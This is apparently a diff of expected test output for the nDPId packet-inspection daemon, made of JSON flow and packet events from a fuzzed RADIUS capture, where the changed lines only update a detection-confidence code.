01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1528997265856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997265856,"pkt":"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"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997265856,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1528997266054,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997266054,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/tpAAPwRVO\/G4hk1CjhAHgcUJQAAzZq1C0gAxTQDE\/syEk8COAKXrk0TJQABNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuTHR3b3JrLm9yZywgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADQlOBVyiA51UB5+BTRf1Z+AgUAAJqmOeZiwwAAElk1sqzX2LSLAQACCwUAAAF5eGigvLsuc5FvQXnfthRQEr72IV3uvADHqUwosXSRIBM="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997266054,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":200000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046661,"flow_last_seen":1528997046661,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"74.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997266594,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00577{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":127,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":127,"packets-processed":104,"total-skipped-flows":0,"total-l4-payload-len":44703,"total-not-detected-flows":6,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":6,"current-active-flows":13,"total-active-flows":27,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":150,"global_ts_msec":1528997294157} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1528997294408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997294408,"pkt":"ABRP+4rqcNuYVcUnCABFAADh\/xpAAPsRVa\/G4hk1ChxAHgcUchAAzU8kC0oAxWEDMLFDKTYIfgbKyEyHMfIBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE1YWUvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjIxT0oBAjRIFwEAAAEFAACfFoRHbsDvI\/+46yBaysIsAgUAAJcLQv7ORgAASiNmmimRHNuLAQACCwUAAKEH8wkM8t7F6HlgkovXWwdQEo++iUihP9VHkRTh6mD7kgU="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997294408,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997294665} 01255{"packet_event_id":1,"packet_event_name":"packet","packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997294408,"pkt":"AAAMB6xAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2296,"global_ts_msec":1528997294874} 
@@ -161,79 +161,79 @@ 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997300431,"pkt":"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"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1528997311323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997311323,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQZAAP8RAAAKDEAexuAZNXIQBxQCxwAAAVACv44mJt0CcxbAbqYZaENsgGMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfIdQlXSVNQUmMwGgkAADghDQMxNwZbIqW\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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997395223} 
01255{"packet_event_id":1,"packet_event_name":"packet","packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997394907,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1528997399308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997399308,"pkt":"ABRPJQDqcNuYVcUnCABFAADhALRAAPwRUxbG4hk1CgwlAAcUchAAzVpOC1QAxRxqj+ts\/zbuXZza\/XyA7U4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b1ZrLm9yZywgNWIyMiUAMTIvZjA6Nxk6NjA6ZDE6N2S6MzcvMjI0T0oBAgBIFwEAAAEFAAClYf4DzpLiqdyPyTgI99pYAgUAAG+BQKA0HAAAC9tSu9kUjAmLAQACCwUAANTPOn7BAwke3m06BT0FpdxQErKfyMWPNDJCfwFi2pzKF6M="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997399801} 00714{"packet_event_id":1,"packet_event_name":"packet","packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997399604,"pkt":"ABRP+4pTcNuYVcUnCAAbAAEwAL1AAPwRUr7G4hk1CgxAHgcUchABHDwbAlUBFM63G2\/ABME95vC\/YtPM3\/caCwAAV8gbBVNQQxpuAAABNxA0xuSFjY5XIJgFQGu0Uv0OYONLFS6YzD8pAXH0KZXHpfwyK4L\/92l5H6gqAq8nL0kepb8RNLxJYMKQCK0eGlYCRiBKtSavfrre3EDS6oPiPCuIZCCfvU44Ccl11WwK9jFxTgAolMtFATUwMzFPNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1DYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNjEyL2YwOjc5OjYwOmQxOjdkOjM3LzIyNFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBL2pfBK3Ll7exMTohpXZCAH"} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1528997403593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997403593,"pkt":"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"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 